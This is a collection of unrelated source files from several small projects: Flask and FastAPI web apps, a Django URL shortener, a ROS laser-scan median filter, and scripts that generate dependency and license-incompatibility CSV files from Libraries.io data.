backref=db.backref("link", uselist=False,cascade="all, delete, delete-orphan"))
class Picture_field(db.Model):
id = db.Column(db.Integer, primary_key=True)
data = db.Column(db.Unicode(255))
encrypted_filename = db.Column(db.Unicode(255))
media_id = db.Column(db.Integer, db.ForeignKey('media.id'))
media = db.relationship("Media", single_parent=True, uselist=False,
backref=db.backref("picture", uselist=False,cascade="all, delete, delete-orphan"))
class File_field(db.Model):
id = db.Column(db.Integer, primary_key=True)
data = db.Column(db.Unicode(255))
encrypted_filename = db.Column(db.Unicode(255))
file_type = db.Column(db.Unicode(30))
media_id = db.Column(db.Integer, db.ForeignKey('media.id'))
media = db.relationship("Media", single_parent=True, uselist=False,
backref=db.backref("file", uselist=False,cascade="all, delete, delete-orphan"))
class Number_field(db.Model):
id = db.Column(db.Integer, primary_key=True)
data = db.Column(db.Float)
media_id = db.Column(db.Integer, db.ForeignKey('media.id'))
media = db.relationship("Media", single_parent=True, uselist=False,
backref=db.backref("number", uselist=False,cascade="all, delete, delete-orphan"))
class Categorical_values(db.Model):
id = db.Column(db.Integer, primary_key=True)
value = db.Column(db.Unicode(255))
category_id = db.Column(db.Integer, db.ForeignKey('categorical_field.id'))
field = db.relationship("Categorical_field", single_parent=True, foreign_keys=[category_id],
backref=db.backref("values",cascade="all, delete, delete-orphan"))
class Categorical_field(db.Model):
id = db.Column(db.Integer, primary_key=True)
media_id = db.Column(db.Integer, db.ForeignKey('media.id'))
media = db.relationship("Media", single_parent=True, uselist=False,
backref=db.backref("category", uselist=False,cascade="all, delete, delete-orphan"))
selected_value = db.Column(db.Unicode(255))
class Media(db.Model):
id = db.Column(db.Integer, primary_key=True)
def default_order_value():
return Fields.query.count()
class Fields(db.Model):
id = db.Column(db.Integer, primary_key=True)
label = db.Column(db.Unicode(64))
media_id = db.Column(db.Integer, db.ForeignKey('media.id'))
media = db.relationship("Media", backref=db.backref("field", uselist=False, order_by="Fields.order"))
display = db.Column(db.Boolean, unique=False, default=True)
order = db.Column(db.Integer, default = default_order_value, nullable = False)
```
#### File: flaskProject/app/__init__.py
```python
from flask import Flask, request
from flask_sqlalchemy import SQLAlchemy
from flask_migrate import Migrate
from flask_login import LoginManager
from flask_moment import Moment
from flask_session import Session
from flask import session
from flask_babel import Babel
from config import Config
from datetime import datetime
from jinja2 import ChoiceLoader, FileSystemLoader
import logging
from logging.handlers import SMTPHandler
from logging.handlers import RotatingFileHandler
import os
app = Flask(__name__)
app.config.from_object(Config)
db = SQLAlchemy(app)
db.create_all()
db.session.commit()
migrate = Migrate(app, db)
babel = Babel(app)
moment = Moment(app)
session_ = Session(app)
login = LoginManager(app)
login.session_protection = "strong"
login.login_view = 'auth.login'
# Blueprints - load the modules located in the auth, sections and tasks folders
from app.auth import bp as auth_bp
from app.sections import bp as sections_bp
from app.tasks import bp as tasks_bp
from app.users import bp as users_bp
app.register_blueprint(auth_bp)
app.register_blueprint(sections_bp, url_prefix = "/sections")
app.register_blueprint(tasks_bp, url_prefix = "/tasks")
app.register_blueprint(users_bp)
# Add a template path for the dynamic field templates
loader = FileSystemLoader("app/dynamic_fields/templates/")
my_loader = ChoiceLoader([
app.jinja_loader, loader ])
app.jinja_loader = my_loader
# The load_user function is required by LoginManager
from app.models import Users
@login.user_loader
def load_user(id):
return Users.query.get(int(id))
# Add the list of languages and the current-time function to jinja's global
# variables so they can be used in templates
app.jinja_env.globals.update(now = datetime.utcnow)
app.jinja_env.globals['LANGUAGES'] = app.config['LANGUAGES']
# Get the current language
@babel.localeselector
def get_locale():
if "CURRENT_LANGUAGE" in session:
return session["CURRENT_LANGUAGE"]
return request.accept_languages.best_match(app.config['LANGUAGES'])
from app import routes, models, errors_handling
```
#### File: app/users/forms.py
```python
from flask_babel import _, lazy_gettext as _l
from flask_wtf import FlaskForm
from wtforms.validators import ValidationError, DataRequired, Email
from app.models import Users
from wtforms import Form, StringField, SubmitField, SelectField
from flask_wtf.file import FileField, FileAllowed
class EditProfileForm_Admin(FlaskForm):
email = StringField(_l('Email'), validators=[DataRequired(), Email()])
role_list = SelectField(_l('Role'),
choices=[('Admin',_l('Admin')),('Usual',_l('Usual user')),('Not confirmed',_l('Not confirmed'))])
picture = FileField(_l('Update Profile Picture'), validators=[FileAllowed(['jpg', 'png','jpeg'])])
submit = SubmitField(_l('Submit'))
def __init__(self, original_email, *args, **kwargs):
super(EditProfileForm_Admin, self).__init__(*args, **kwargs)
self.original_email = original_email
def validate_email(self, email):
if email.data != self.original_email:
user = Users.query.filter_by(email=self.email.data).first()
if user is not None:
raise ValidationError(_l('Please use a different email.'))
class EditProfileForm(FlaskForm):
picture = FileField(_l('Update Profile Picture'), validators=[FileAllowed(['jpg', 'png','jpeg'])])
submit = SubmitField(_l('Submit'))
``` |
{
"source": "4kuma/synapsi_internship",
"score": 4
} |
#### File: 4kuma/synapsi_internship/task2.py
```python
from random import randint
def main():
min_value = 1
max_value = 0
while min_value > max_value:
min_value = randint(0, 150)
max_value = randint(75, 200)
while True:
user_input = input(f'Input number in range {min_value} - {max_value}\n')
try:
n = int(user_input)
if n < min_value:
print(f'Input number is lesser than min value!!!\n')
elif n > max_value:
print(f'Input number is greater than max value!!!\n')
else:
input_value = n
break
except ValueError:
print("Input is in wrong format!!!\n")
if __name__ == '__main__':
main()
``` |
{
"source": "4l3x7/sayhello",
"score": 2
} |
#### File: sayhello/sayhello/errors.py
```python
from flask import render_template
from sayhello import app
@app.errorhandler(404)
def page_not_found(e):  # Flask passes the error instance to the handler
return render_template('errors/404.html'), 404
@app.errorhandler(500)
def internal_server_error(e):  # Flask passes the error instance to the handler
return render_template('errors/500.html'), 500
``` |
{
"source": "4-legends/Software-for-robotics-rob599",
"score": 2
} |
#### File: rob599_hw3/scripts/median_filter.py
```python
import rospy
import math
import numpy as np
from sensor_msgs.msg import LaserScan
#######################################
# Laser Scan:
# Header: Seq, Stamp, frame_id
# Angle_min, Angle_max, Angle_Increment, Time_Increment
# Scan time, range_min, range_max, ranges, intensities
#######################################
class Laser_Filter:
def __init__(self):
#rospy.on_shutdown(self.save_csv)
self.laser_sub = rospy.Subscriber('/base_scan', LaserScan, self.laser_callback)
self.scan_pub = rospy.Publisher('/laser_scan', LaserScan, queue_size= 1)
def laser_callback(self, msg):
filtered_values = LaserScan()
distance = np.array(msg.ranges)
filtered_values.header = msg.header
filtered_values.angle_increment = msg.angle_increment
filtered_values.time_increment = msg.time_increment
filtered_values.scan_time = msg.scan_time
filtered_values.range_min = msg.range_min
filtered_values.range_max = msg.range_max
filtered_values.intensities = msg.intensities
angle = filtered_values.angle_increment
min_angle = msg.angle_min
max_angle = msg.angle_max
median_filter_size = rospy.get_param('median_filter_size')
if median_filter_size < 1:
median_filter_size = 1
elif median_filter_size > len(distance)/2 - 1:
median_filter_size = int(len(distance)/2 - 1)
filtered_values_ranges = np.zeros(len(distance))
for i in range(len(distance) - median_filter_size - 1):
if i < median_filter_size:
filtered_values_ranges[i] = 0
else:
filtered_values_ranges[i] = np.median(distance[(i - median_filter_size):(i + median_filter_size+1)])
if filtered_values_ranges[i] > msg.range_max or filtered_values_ranges[i] < 0:
filtered_values_ranges[i] = 0
filtered_values.ranges = filtered_values_ranges
filtered_values.angle_min = min_angle
filtered_values.angle_max = max_angle
self.scan_pub.publish(filtered_values)
if __name__ == '__main__':
rospy.init_node('median_filter', anonymous=True)
laser_filter = Laser_Filter()
try:
rospy.spin()
except KeyboardInterrupt:
print("Shutting down")
``` |
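The heart of `laser_callback` above is a sliding-window median over the range readings. The standalone sketch below mirrors that loop without ROS, including the zeroing of out-of-range values, so the behaviour can be tried on a plain list.
```python
import numpy as np

def median_filter(ranges, k, range_max):
    """Median over a window of 2*k+1 readings, mirroring the callback above."""
    ranges = np.asarray(ranges, dtype=float)
    filtered = np.zeros(len(ranges))
    for i in range(k, len(ranges) - k - 1):
        filtered[i] = np.median(ranges[i - k:i + k + 1])
        if filtered[i] > range_max or filtered[i] < 0:
            filtered[i] = 0.0
    return filtered

scan = [1.0, 1.1, 9.0, 1.2, 1.3, 1.2, 1.1]  # 9.0 is a spurious spike
print(median_filter(scan, k=1, range_max=5.0))
# [0.  1.1 1.2 1.3 1.2 0.  0. ]  the spike is suppressed, the borders stay zero
```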
{
"source": "4lexandreC/telebotOrderbook",
"score": 3
} |
#### File: 4lexandreC/telebotOrderbook/telegramBot.py
```python
import requests
import json
import configparser as cfg
import telebot
## Telegram bot wrapper class. Without telebot you would have to implement the API
## methods yourself; once init_tele is called, telebot covers most of this class.
class telegramBot():
def __init__(self, config):
self.token = self.read_token(config)
self.base = "https://api.telegram.org/bot{}/".format(self.token)
def init_tele(self):
self.tbot = telebot.TeleBot(token=self.token)
def tele(self):
return self.tbot
## execute https://api.telegram.org/bot{token here}/getUpdates?timeout=100
def get_updates(self, offset=None):
url = self.base + "getUpdates?timeout=100"
if offset:
url = url + "&offset={}".format(offset + 1)
r = requests.get(url)
return json.loads(r.content)
def send_message(self, msg, chat_id):
url = self.base + "sendMessage?chat_id={}&text={}".format(chat_id, msg)
if msg is not None:
requests.get(url)
def read_token(self, config):
parser = cfg.ConfigParser()
parser.read(config)
return parser.get('creds', 'token')
``` |
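A hedged usage sketch of the wrapper above: a long-polling loop that echoes incoming messages. The `config.cfg` filename (an INI file with a `[creds]` section containing `token = ...`) and the echo behaviour are assumptions for illustration, not part of the class.
```python
from telegramBot import telegramBot

bot = telegramBot('config.cfg')  # assumed config file name

last_update_id = None
while True:
    updates = bot.get_updates(offset=last_update_id)
    for update in updates.get('result', []):
        last_update_id = update['update_id']
        message = update.get('message', {})
        chat_id = message.get('chat', {}).get('id')
        text = message.get('text')
        if chat_id and text:
            bot.send_message('You said: {}'.format(text), chat_id)
```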
{
"source": "4lexbit/url-manager-API",
"score": 2
} |
#### File: url-manager-API/urlman/views.py
```python
from django.shortcuts import get_object_or_404
from django.views.generic import RedirectView
from rest_framework import status
from rest_framework.generics import RetrieveDestroyAPIView, ListCreateAPIView, DestroyAPIView
from ipware import get_client_ip
from rest_framework.response import Response
from authentication.models import User
from .models import UrlItem, UrlViews
from .permissions import IsOwner
from .serializers import UrlItemListSerializer, UrlItemDetailSerializer, UrlViewsSerializer
class ClientRedirection(RedirectView):
permanent = False
def get_redirect_url(self, *args, **kwargs):
url = get_object_or_404(UrlItem, short_code=kwargs['short_code'])
client_ip, is_routable = get_client_ip(self.request)
UrlViews.objects.create(item=url, ip=client_ip)
return url.entered_url
class UrlList(ListCreateAPIView):
serializer_class = UrlItemListSerializer
permission_classes = (IsOwner,)
def get_queryset(self):
return UrlItem.objects.filter(owner=self.request.user)
def perform_create(self, serializer):
owner = get_object_or_404(User, id=self.request.user.id)
return serializer.save(owner=owner)
class UrlSingle(RetrieveDestroyAPIView):
serializer_class = UrlItemDetailSerializer
queryset = UrlItem.objects.all()
lookup_field = 'short_code'
permission_classes = (IsOwner,)
def destroy(self, request, *args, **kwargs):
instance = self.get_object()
self.perform_destroy(instance)
return Response('Successfully deleted', status=status.HTTP_204_NO_CONTENT)
class UrlViewDelete(DestroyAPIView):
serializer_class = UrlViewsSerializer
queryset = UrlViews.objects.all()
permission_classes = (IsOwner,)
def destroy(self, request, *args, **kwargs):
instance = self.get_object()
self.perform_destroy(instance)
return Response('Successfully deleted', status=status.HTTP_204_NO_CONTENT)
``` |
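The views above import an `IsOwner` permission class from `.permissions` that is not part of this excerpt. One plausible Django REST Framework implementation is sketched below; it is an assumption about the project, not its actual code.
```python
from rest_framework import permissions

class IsOwner(permissions.BasePermission):
    """Allow authenticated users to act only on objects they own."""

    def has_permission(self, request, view):
        return bool(request.user and request.user.is_authenticated)

    def has_object_permission(self, request, view, obj):
        # UrlItem exposes `owner` directly; UrlViews reaches it through `item`.
        owner = getattr(obj, 'owner', None)
        if owner is None and getattr(obj, 'item', None) is not None:
            owner = obj.item.owner
        return owner == request.user
```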
{
"source": "4lexbit/url-manager-backend",
"score": 2
} |
#### File: db/models/__init__.py
```python
import pkgutil
from pathlib import Path
from urlman.db.models.transition import TransitionModel
from urlman.db.models.urls import UrlModel
from urlman.db.models.user import UserModel
def load_all_models() -> None:
"""Load all models from this folder."""
package_dir = Path(__file__).resolve().parent
modules = pkgutil.walk_packages(
path=[str(package_dir)],
prefix="urlman.db.models.",
)
for module in modules:
__import__(module.name)
__all__ = [
"UrlModel",
"UserModel",
"TransitionModel",
"load_all_models",
]
```
#### File: urls/repos/selectors.py
```python
from typing import List, Optional
from sqlalchemy import select
from sqlalchemy.ext.asyncio import AsyncSession
from sqlalchemy.orm import joinedload
from starlette.requests import Request
from urlman.db.models import UrlModel
from urlman.db.models.user import UserModel
async def get_shorted_url_by_id(
*,
url_id: str,
child: bool = False,
session: AsyncSession,
) -> Optional[UrlModel]:
"""Get shorted url by id from db."""
if child:
stmt = select(UrlModel).where(
UrlModel.id == url_id,
UrlModel.is_deleted == False,
)
else:
stmt = (
select(UrlModel)
.where(
UrlModel.id == url_id,
UrlModel.is_deleted == False,
)
.options(
joinedload(UrlModel.transitions),
)
)
result = await session.execute(stmt)
return result.scalars().first()
async def get_url_by_shortcode(
url_shortcode: str,
session: AsyncSession,
) -> Optional[UrlModel]:
"""Get shorted url by shortcode from db."""
stmt = select(UrlModel).where(
UrlModel.short_code == url_shortcode,
UrlModel.is_deleted == False,
)
result = await session.execute(stmt)
return result.scalars().first()
async def get_list_shorted_urls(
user: UserModel,
session: AsyncSession,
) -> List[UrlModel]:
"""Get shorted urls of current user."""
stmt = select(UrlModel).where(
UrlModel.user == user,
UrlModel.is_deleted == False,
)
result = await session.execute(stmt)
return result.scalars().fetchall()
async def get_all_urls(session: AsyncSession) -> List[UrlModel]:
"""Get all shorted urls."""
stmt = select(UrlModel).order_by(UrlModel.created_at)
result = await session.execute(stmt)
return result.scalars().fetchall()
async def get_client_ip(request: Request) -> str:
"""Get client ip address from request."""
if "x-forwarded-for" in request.headers:
client_ip = request.headers.get("x-forwarded-for")
else:
client_ip = request.client.host
return client_ip
```
#### File: api/users/exceptions.py
```python
from fastapi import HTTPException
class UserNotFoundException(HTTPException):
"""Raised when user is not founded."""
def __init__(self) -> None:
super(UserNotFoundException, self).__init__(
status_code=404,
detail="User not found.",
)
class UserNotProvidedException(HTTPException):
"""Raised when user token is invalid."""
def __init__(self) -> None:
super(UserNotProvidedException, self).__init__(
status_code=401,
detail="User not provided.",
)
class UserCredentialsException(HTTPException):
"""Raised when users credentials are wrong."""
def __init__(self) -> None:
super(UserCredentialsException, self).__init__(
status_code=401,
detail="Could not validate credentials.",
headers={"WWW-Authenticate": "Bearer"},
)
class UserPasswordMismatchException(HTTPException):
"""Raised when password don't match."""
def __init__(self) -> None:
super(UserPasswordMismatchException, self).__init__(
status_code=400,
detail="Passwords don't match",
)
```
#### File: users/repos/selectors.py
```python
from typing import List, Optional
from fastapi import Depends
from fastapi.security import HTTPAuthorizationCredentials
from sqlalchemy import select
from sqlalchemy.ext.asyncio import AsyncSession
from sqlalchemy.orm import joinedload
from urlman.db.dependencies import get_db_session
from urlman.db.models import UserModel
from urlman.settings import settings
from urlman.web.api.auth import jwt_auth
from urlman.web.api.users.exceptions import (
UserCredentialsException,
UserNotProvidedException,
)
async def get_user_by_id(*, user_id: str, session: AsyncSession) -> Optional[UserModel]:
"""Get user by id(UUID) from db."""
stmt = (
select(UserModel)
.where(
UserModel.id == user_id,
)
.options(
joinedload(UserModel.urls),
)
)
result = await session.execute(stmt)
return result.scalars().first()
async def get_user_by_username(
*,
username: str,
session: AsyncSession,
) -> Optional[UserModel]:
"""Get user by username from db."""
stmt = select(UserModel).where(UserModel.username == username)
result = await session.execute(stmt)
return result.scalars().first()
async def get_users(*, session: AsyncSession) -> List[UserModel]:
"""Get all active user."""
stmt = (
select(UserModel)
.where(
UserModel.is_deleted == False,
)
.order_by(
UserModel.created_at,
)
)
result = await session.execute(stmt)
return result.scalars().fetchall()
async def get_all_users(*, session: AsyncSession) -> List[UserModel]:
"""Get all users from db."""
stmt = select(UserModel).order_by(UserModel.created_at)
result = await session.execute(stmt)
return result.scalars().fetchall()
async def get_current_user(
*,
token: HTTPAuthorizationCredentials = Depends(settings.auth_scheme),
session: AsyncSession = Depends(get_db_session),
) -> Optional[UserModel]:
"""Getting the current user."""
try:
username = jwt_auth.decode_token(token=token.credentials)
except Exception:
raise UserNotProvidedException()
user = await get_user_by_username(username=username, session=session)
if user is None:
raise UserCredentialsException()
return user
```
#### File: api/users/schemas.py
```python
import uuid
from typing import List, Optional
from pydantic import BaseModel, validate_email, validator
from urlman.web.api.urls.schemas import UrlOut
class UserOut(BaseModel):
"""Output User scheme."""
id: uuid.UUID
username: str
email: str
first_name: Optional[str] = None
last_name: Optional[str] = None
class Config:
title = "UserOutputScheme"
orm_mode = True
class UserExtended(UserOut):
"""Extended output User scheme."""
urls: List[UrlOut] = []
class Config:
title = "UserExtendedOutputScheme"
orm_mode = True
class UserIn(BaseModel):
"""Input User scheme."""
username: str
email: str
first_name: Optional[str] = None
last_name: Optional[str] = None
password: str
@validator("email")
def email_validation(cls, v):
"""Email validation."""
return validate_email(v)[1]
class Config:
title = "UserInputScheme"
orm_mode = True
schema_extra = {
"example": {
"username": "johndoe",
"email": "<EMAIL>",
"first_name": "John",
"last_name": "Doe",
"password": "<PASSWORD>",
},
}
class UserUpdate(UserIn):
"""Update User scheme."""
username: Optional[str] = None
email: Optional[str] = None
class Config:
title = "UserUpdateScheme"
class UserChangePassword(BaseModel):
"""Change user password scheme."""
password: str
new_password: Optional[str] = None
class Config:
title = "UserChangePasswordScheme"
schema_extra = {
"example": {
"password": "password",
"new_password": "<PASSWORD>",
},
}
class UserCredentials(BaseModel):
"""User credentials scheme."""
username: Optional[str] = None
password: Optional[str] = None
class Config:
title = "UserCredentialsScheme"
schema_extra = {
"example": {
"username": "johndoe",
"password": "<PASSWORD>",
},
}
```
#### File: api/users/views.py
```python
from fastapi import APIRouter, Depends, HTTPException
from fastapi_pagination import LimitOffsetPage, paginate
from sqlalchemy.exc import IntegrityError
from sqlalchemy.ext.asyncio import AsyncSession
from urlman.db.dependencies import get_db_session
from urlman.db.models import UserModel
from urlman.services.hashing import verify_password
from urlman.web.api.auth import jwt_auth
from urlman.web.api.auth.schemas import AccessToken
from urlman.web.api.users.exceptions import UserNotFoundException
from urlman.web.api.users.repos.selectors import (
get_current_user,
get_user_by_id,
get_user_by_username,
get_users,
)
from urlman.web.api.users.repos.services import (
change_user_password,
delete_user,
register_user,
soft_delete_user,
update_user,
)
from urlman.web.api.users.schemas import (
UserChangePassword,
UserCredentials,
UserExtended,
UserIn,
UserOut,
UserUpdate,
)
router = APIRouter()
@router.get("/profile", response_model=UserExtended, status_code=200)
async def profile(
current_user: UserModel = Depends(get_current_user),
session: AsyncSession = Depends(get_db_session),
):
"""Get current User profile."""
return await get_user_by_id(
user_id=current_user.id,
session=session,
)
@router.get("/{user_id}", response_model=UserExtended, status_code=200)
async def get_single_user(
user_id: str,
current_user: UserModel = Depends(get_current_user),
session: AsyncSession = Depends(get_db_session),
):
"""Get single User."""
try:
user = await get_user_by_id(user_id=user_id, session=session)
except IntegrityError as ie:
raise HTTPException(status_code=400, detail=str(ie.orig))
if user is None:
raise UserNotFoundException()
return user
@router.get("", response_model=LimitOffsetPage[UserOut], status_code=200)
async def get_list_users(
session: AsyncSession = Depends(get_db_session),
current_user: UserModel = Depends(get_current_user),
):
"""Get list of undeleted active Users."""
users = await get_users(
session=session,
)
return paginate(users)
@router.post("/register", response_model=UserOut, status_code=201)
async def create_user(
user: UserIn,
session: AsyncSession = Depends(get_db_session),
):
"""Create new User."""
try:
user = await register_user(user=user, session=session)
except IntegrityError as ie:
raise HTTPException(status_code=400, detail=str(ie.orig))
return user
@router.post("/login", status_code=200, response_model=AccessToken)
async def login(
user_credentials: UserCredentials,
session: AsyncSession = Depends(get_db_session),
):
"""Get User token."""
try:
user = await get_user_by_username(
username=user_credentials.username,
session=session,
)
except IntegrityError as ie:
raise HTTPException(status_code=400, detail=str(ie.orig))
if user is None:
raise UserNotFoundException()
if not verify_password(
db_password=<PASSWORD>,
verifiable_password=<PASSWORD>,
):
raise UserNotFoundException()
access_token = jwt_auth.encode_token(username=user.username)
return AccessToken(access_token=access_token)
@router.patch("/change_password", status_code=200)
async def change_password(
user_credentials: UserChangePassword,
current_user: UserModel = Depends(get_current_user),
session: AsyncSession = Depends(get_db_session),
):
"""Change current user password."""
try:
await change_user_password(
user=current_user,
creds=user_credentials,
session=session,
)
except IntegrityError as ie:
raise HTTPException(status_code=400, detail=str(ie.orig))
@router.patch("/{user_id}", response_model=UserOut, status_code=200)
async def update_single_user(
user_id: str,
data: UserUpdate,
current_user: UserModel = Depends(get_current_user),
session: AsyncSession = Depends(get_db_session),
):
"""Update User info."""
try:
user = await update_user(
user_id=user_id,
data=data,
session=session,
)
except IntegrityError as ie:
raise HTTPException(status_code=400, detail=str(ie.orig))
if user is None:
raise UserNotFoundException()
return user
@router.patch("/{user_id}/soft_delete", status_code=204)
async def delete_user_soft(
user_id: str,
current_user: UserModel = Depends(get_current_user),
session: AsyncSession = Depends(get_db_session),
):
"""Soft delete user."""
try:
await soft_delete_user(
user_id=user_id,
session=session,
)
except IntegrityError as ie:
raise HTTPException(status_code=400, detail=str(ie.orig))
@router.delete("/{user_id}", status_code=200)
async def delete_user_hard(
user_id: str,
current_user: UserModel = Depends(get_current_user),
session: AsyncSession = Depends(get_db_session),
):
"""Delete User."""
try:
await delete_user(
user_id=user_id,
session=session,
)
except IntegrityError as ie:
raise HTTPException(status_code=400, detail=str(ie.orig))
```
#### File: urlman/web/lifetime.py
```python
from asyncio import current_task
from typing import Awaitable, Callable
from fastapi import FastAPI
from sqlalchemy.ext.asyncio import (
AsyncSession,
async_scoped_session,
create_async_engine,
)
from sqlalchemy.orm import sessionmaker
from urlman.settings import settings
def _setup_db(app: FastAPI) -> None:
"""
Create connection to the database.
This function creates SQLAlchemy engine instance,
session_factory for creating sessions
and stores them in the application's state property.
:param app: fastAPI application.
"""
engine = create_async_engine(str(settings.db_url), echo=settings.db_echo)
session_factory = async_scoped_session(
sessionmaker(
engine,
expire_on_commit=False,
class_=AsyncSession,
),
scopefunc=current_task,
)
app.state.db_engine = engine
app.state.db_session_factory = session_factory
def startup(app: FastAPI) -> Callable[[], Awaitable[None]]:
"""
Actions to run on application startup.
This function use fastAPI app to store data,
such as db_engine.
:param app: the fastAPI application.
:return: function that actually performs actions.
"""
async def _startup() -> None:
_setup_db(app)
return _startup
def shutdown(app: FastAPI) -> Callable[[], Awaitable[None]]:
"""
Actions to run on application's shutdown.
:param app: fastAPI application.
:return: function that actually performs actions.
"""
async def _shutdown() -> None:
await app.state.db_engine.dispose()
return _shutdown
``` |
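The `get_db_session` dependency used throughout the views in this project is imported from `urlman.db.dependencies` but not included in this excerpt. Given the engine and session factory stored on `app.state` above, a minimal version could look like the sketch below; this is an assumption, not necessarily the project's implementation.
```python
from typing import AsyncGenerator

from sqlalchemy.ext.asyncio import AsyncSession
from starlette.requests import Request

async def get_db_session(request: Request) -> AsyncGenerator[AsyncSession, None]:
    """Yield a session created from the factory on the application state."""
    session: AsyncSession = request.app.state.db_session_factory()
    try:
        yield session
    finally:
        await session.close()
```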
{
"source": "4lgn/license-incompatibility",
"score": 2
} |
#### File: experiment/generator/dependencies.py
```python
import csv
import gzip
import re
import os
def generate(dbmsImportPath, librariesIoDataPath, cutoff = -1, filterProjects = set()):
print('Opening and writing dependency header files...')
projectsDependenciesHeaderFile = open(os.path.join(dbmsImportPath, 'project-dependencies_header.csv'), "w+", encoding="utf-8")
versionDependenciesHeaderFile = open(os.path.join(dbmsImportPath, 'version-dependencies_header.csv'), "w+", encoding="utf-8")
projectsDependenciesHeaderFile.write('projectId:START_ID(Project),dependencyProjectId:END_ID(Project)')
versionDependenciesHeaderFile.write('versionId:START_ID(Version),dependencyRequirement,dependencyProjectId:END_ID(Project)')
projectsDependenciesHeaderFile.close()
versionDependenciesHeaderFile.close()
print('Opening dependency files...')
projectDependenciesFile = open(os.path.join(dbmsImportPath, 'project-dependencies.csv'), "w", encoding="utf-8")
versionDependenciesFile = open(os.path.join(dbmsImportPath, 'version-dependencies.csv'), "w", encoding="utf-8")
relationSet = set()
print('Generating dependencies...')
with open(os.path.join(librariesIoDataPath, "dependencies-1.6.0-2020-01-12.csv"), "r", encoding="utf-8") as f:
reader = csv.reader(f)
dependenciesWritten = 0
line_count = 0
cyclicDependencies = 0
optionalDependencies = 0
# skip first header line
next(reader)
for row in reader:
if (cutoff != -1 and line_count > cutoff):
break
line_count += 1
if (line_count % 500000 == 0):
print(line_count)
projectId = row[3]
dependencyVersion = row[4]
dependencyVersionId = row[5]
dependencyKind = row[8]
optionalDependency = row[9]
dependencyReqs = row[10]
dependencyProjectId = row[11]
# Skip cyclic dependencies
if (projectId == dependencyProjectId):
cyclicDependencies += 1
continue
# Skip optional dependency
if (optionalDependency == 'true'):
optionalDependencies += 1
continue
# If we have filterProjects defined, skip all projects we don't have in our filter
if (len(filterProjects) > 0 and (not (filterProjects.__contains__(projectId) or filterProjects.__contains__(dependencyProjectId)))):
continue
if (not dependencyKind in ['runtime','RUNTIME', 'compile', 'COMPILE', 'provided', 'normal', 'build', 'imports', 'import', 'configure', 'depends', 'system']):
continue
if (projectId and dependencyProjectId and dependencyVersion and dependencyKind):
dependenciesWritten += 1
dependencyReqVersionFiltered = dependencyReqs.replace('"', "'")
versionDependenciesFile.write(f'{dependencyVersionId},"{dependencyReqVersionFiltered}",{dependencyProjectId}\n')
if (dependencyProjectId.isnumeric()):
if (not relationSet.__contains__((projectId, dependencyProjectId))):
relationSet.add((projectId, dependencyProjectId))
projectDependenciesFile.write(f'{projectId},{dependencyProjectId}\n')
print(f'Generated {dependenciesWritten} dependency nodes (skipped {line_count - dependenciesWritten})...')
print(f'... with {cyclicDependencies} of them being cyclic dependencies and {optionalDependencies} being optional (skipped)')
versionDependenciesFile.close()
projectDependenciesFile.close()
```
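A minimal usage sketch for the generator above, assuming the module is importable as `dependencies`; the directory paths, the cutoff, and the project-id filter are placeholders chosen for illustration, not values from the repository.
```python
# Hypothetical invocation of the dependency generator defined above.
# Both directory paths and the project ids are illustrative placeholders.
import dependencies

dbms_import_path = "/tmp/neo4j-import"          # assumed Neo4j import directory
libraries_io_path = "/data/libraries-io-1.6.0"  # assumed Libraries.io dump location

# Restrict the run to rows touching two (made-up) project ids and stop
# after one million CSV rows to keep the example fast.
dependencies.generate(
    dbms_import_path,
    libraries_io_path,
    cutoff=1_000_000,
    filterProjects={"12345", "67890"},
)
```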
#### File: experiment/generator/licensesPermutations.py
```python
import csv
import gzip
import os
def generate(dbmsImportPath, librariesIoDataPath):
print('Opening and writing the license incompatibility header file...')
licenseIncompHeaderFile = open(os.path.join(dbmsImportPath, 'license-incompatibilities_header.csv'), "w", encoding="utf-8")
licenseIncompHeaderFile.write('licenseId:START_ID(License),isIncompatibleWithLicenseId:END_ID(License)')
licenseIncompHeaderFile.close()
print('Opening the license incompatibility file...')
licenseIncompFile = open(os.path.join(dbmsImportPath, 'license-incompatibilities.csv'), "w", encoding="utf-8")
permissive = [
"MIT", "MIT-feh", "MIT-0",
"MITNFA", "MIT-CMU", "X11",
"BSD-2-Clause", "BSD-2-Clause-FreeBSD", "BSD-2-Clause-NetBSD",
"BSD-3-Clause", "BSD-3-Clause-Attribution", "BSD-3-Clause-Clear",
"BSD-3-Clause-No-Nuclear-Warranty", "BSD-3-Clause-No-Nuclear-License",
"BSD-3-Clause-LBNL", "Apache-2.0", "Apache-1.0",
"Apache-1.1", "Zlib", "zlib-acknowledgement",
"Libpng"
]
weakCopy = [
"MPL-1.1", "MPL-2.0", "LGPL-3.0",
"LGPL-2.1", "LGPL-2.0", "LGPL-3.0+",
"LGPL-3.0-only", "LGPL-2.0+", "LGPL-2.1+",
"LGPL-2.0-only", "LGPL-2.0-or-later", "LGPL-2.1-only",
"LGPL-3.0-or-later", "LGPL-2.1-or-later"
]
strongCopy = [
"GPL-2.0", "GPL-3.0", "GPL-3.0-only",
"GPL-3.0-or-later", "GPL-2.0+", "GPL-2.0-with-font-exception",
"GPL-3.0+", "GPL-2.0-only", "GPL-2.0-or-later",
"GPL-1.0-or-later", "GPL-1.0+", "GPL-2.0-with-classpath-exception",
"GPL-3.0-with-GCC-exception", "GPL-2.0-with-GCC-exception", "GPL-1.0",
"GPL-3.0-with-autoconf-exception", "AGPL-3.0", "AGPL-3.0-or-later",
"AGPL-1.0", "AGPL-3.0-only"
]
lgplVariations = [
"LGPL-3.0", "LGPL-2.1", "LGPL-2.0",
"LGPL-3.0+", "LGPL-3.0-only", "LGPL-2.0+",
"LGPL-2.1+", "LGPL-2.0-only", "LGPL-2.0-or-later",
"LGPL-2.1-only", "LGPL-3.0-or-later", "LGPL-2.1-or-later"
]
print("Mapping found project licenses to their ids")
licensesIdMap = dict()
with open(os.path.join(dbmsImportPath, 'licenses.csv'), "r", encoding="utf-8") as f:
reader = csv.reader(f)
for row in reader:
licenseId = row[0]
name = row[1]
licensesIdMap[name] = licenseId
print("Mapped " + str(len(licensesIdMap.keys())) + " licenses")
line_count = 0
print('Generating license incompatibility relationships...')
# all permissive is incompatible with strong copyleft
for p in permissive:
# Can uncomment this if we want permissive to also be incompatible with weak copyleft
# for w in weakCopy:
# if (p in licensesIdMap and w in licensesIdMap):
# line_count += 1
# license1Id = licensesIdMap[p]
# license2Id = licensesIdMap[w]
# licenseIncompFile.write(f'{license1Id},{license2Id}\n')
for s in strongCopy:
if (p in licensesIdMap and s in licensesIdMap):
line_count += 1
license1Id = licensesIdMap[p]
license2Id = licensesIdMap[s]
licenseIncompFile.write(f'{license1Id},{license2Id}\n')
